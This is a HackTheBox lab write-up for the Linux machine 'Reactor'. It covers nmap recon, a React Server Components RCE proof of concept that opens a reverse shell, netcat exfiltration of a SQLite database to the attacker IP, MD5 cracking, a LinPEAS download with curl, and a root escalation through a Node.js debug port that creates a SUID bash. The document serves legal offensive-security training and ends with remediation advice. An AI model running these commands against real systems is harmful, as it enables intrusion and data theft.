← back to all writeups

Reactor

Linux Medium Pwned: 2026-06-01

Overview

FieldDetails
Machine NameReactor
Operating SystemLinux (Ubuntu 24.04 LTS)
DifficultyMedium
Attack IP10.10.14.77
Target IP10.129.5.40
StatusPwned

Executive Summary

This writeup documents my approach to compromising the HackTheBox machine "Reactor." The engagement involved exploiting a known Remote Code Execution vulnerability in a React Server Components implementation to gain initial access, recovering and cracking credentials from a local database, and escalating privileges by abusing a misconfigured Node.js debug port running as root.


Methodology

I followed a structured penetration testing approach:

  1. Reconnaissance & Enumeration
  2. Vulnerability Identification
  3. Exploitation
  4. Post-Exploitation & Lateral Movement
  5. Privilege Escalation
  6. Reporting

Reconnaissance

I began with a service and version scan using Nmap to identify exposed attack surface:

bash

nmap -sV -sC 10.129.5.40

Findings:

PortServiceDetails
22SSHOpenSSH
3000HTTPNext.js application

Navigating to port 3000 revealed a web application identified as "ReactorWatch Monitoring Dashboard." I inspected the page source and bundled JavaScript to fingerprint the exact framework versions in use:


Vulnerability Identification

Cross-referencing the identified versions against public vulnerability databases, I identified CVE-2025-55182 — a Remote Code Execution vulnerability affecting React Server Components in the identified version range. This vulnerability allows an unauthenticated attacker to execute arbitrary commands on the server through a malformed server action request.

References:


Initial Foothold

I cloned the proof-of-concept exploit and installed its dependencies:

bash

git clone https://github.com/zr0n/react2shell
cd react2shell
npm install

Set up a reverse shell listener:

bash

nc -lvnp 4444

Executed the exploit targeting the vulnerable application:

bash

node react2shell.js http://10.129.5.40:3000 shell 10.10.14.77 4444

Result: Reverse shell obtained as user node.


Post-Exploitation

Credential Harvesting

I enumerated the application directory and identified a SQLite database:

find /opt -name "*.db" 2>/dev/null
# /opt/reactor-app/reactor.db

I exfiltrated the database to my attack machine using netcat:

Receiver (Kali):

nc -lvnp 9001 > reactor.db

Sender (Target):

cat /opt/reactor-app/reactor.db | nc 10.10.14.77 9001

Database Analysis

sqlite3 reactor.db
.tables
SELECT * FROM users;

Output:

admin|a203b22191d744a4e70ada5c101b17b8|administrator|admin@reactor.htb
engineer|39d97110eafe2a9a68639812cd271e8e|operator|engineer@reactor.htb

Hash Cracking

The password hashes were identified as MD5 (32-character hexadecimal). I formatted them for offline cracking:

echo 'admin:a203b22191d744a4e70ada5c101b17b8' > hashes.txt
echo 'engineer:39d97110eafe2a9a68639812cd271e8e' >> hashes.txt
john hashes.txt --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt

Result:

reactor1    (engineer)

SSH Access

Using the recovered credentials I authenticated via SSH:

bash

ssh engineer@10.129.5.40
# Password: reactor1

User Flag

cat ~/user.txt
d3c69fa65f8b7760cfd538ecd7c2f5a7

Privilege Escalation

Enumeration

I transferred and executed LinPEAS for automated privilege escalation enumeration:

# Kali — serve the script
python3 -m http.server 8000

# Target — download and execute
curl http://10.10.14.77:8000/linpeas.sh -o /tmp/linpeas.sh
chmod +x /tmp/linpeas.sh
/tmp/linpeas.sh

Vulnerability Identified — Node.js Debug Port

LinPEAS highlighted a critical misconfiguration in the running process list:

root  1419  /usr/bin/node --inspect=127.0.0.1:9229 /opt/uptime-monitor/worker.js

A Node.js process owned by root was running with the --inspect flag, which enables the V8 Inspector Protocol on port 9229. This protocol allows a connected debugger to evaluate arbitrary JavaScript within the process context. Since the process runs as root, any executed code inherits root privileges.

The port was bound to localhost only, requiring port forwarding to reach it externally.

Port Forwarding

I used SSH local port forwarding to tunnel the debug port to my attack machine:

bash

ssh -L 9229:127.0.0.1:9229 engineer@10.129.5.40

This maps 127.0.0.1:9229 on the target to localhost:9229 on my machine through the authenticated SSH tunnel.

Attaching the Debugger

I opened Chrome and navigated to the built-in inspector:

chrome://inspect

I clicked Configure, added localhost:9229, and the remote Node.js process appeared as an inspectable target. I clicked inspect to open a dedicated DevTools session connected to the root process.

Code Execution as Root

In the DevTools console I executed the following JavaScript to create a SUID copy of bash:

javascript

require('child_process').exec('cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash')

This uses Node's native child_process module to copy the bash binary to /tmp and apply the SUID bit, causing it to execute with the permissions of its owner — root.

Privilege Escalation

Back on the target I executed the SUID binary with the -p flag, which instructs bash to preserve the elevated effective user ID rather than dropping to the real user:

bash

/tmp/rootbash -p
whoami
root

Root Flag

cat /root/root.txt
de09ae48ae3ccb6e84b89d176cfadc75

Vulnerability Summary

#VulnerabilitySeverityImpact
1CVE-2025-55182 — React Server Components RCECriticalInitial access as node user
2Plaintext credentials in SQLite databaseMediumCredential recovery
3Weak MD5 password hashingMediumPassword recovery via offline cracking
4Node.js --inspect port running as rootHighFull privilege escalation to root

Remediation Recommendations

FindingRecommendation
Outdated React/Next.jsUpdate to latest stable versions
MD5 password hashingMigrate to bcrypt or Argon2
Node.js debug port in productionRemove --inspect flag from production services
Debug port running as rootRun services as least-privilege user

Tools Used


_This machine was completed as part of HackTheBox practice for developing offensive security skills in a legal, controlled environment._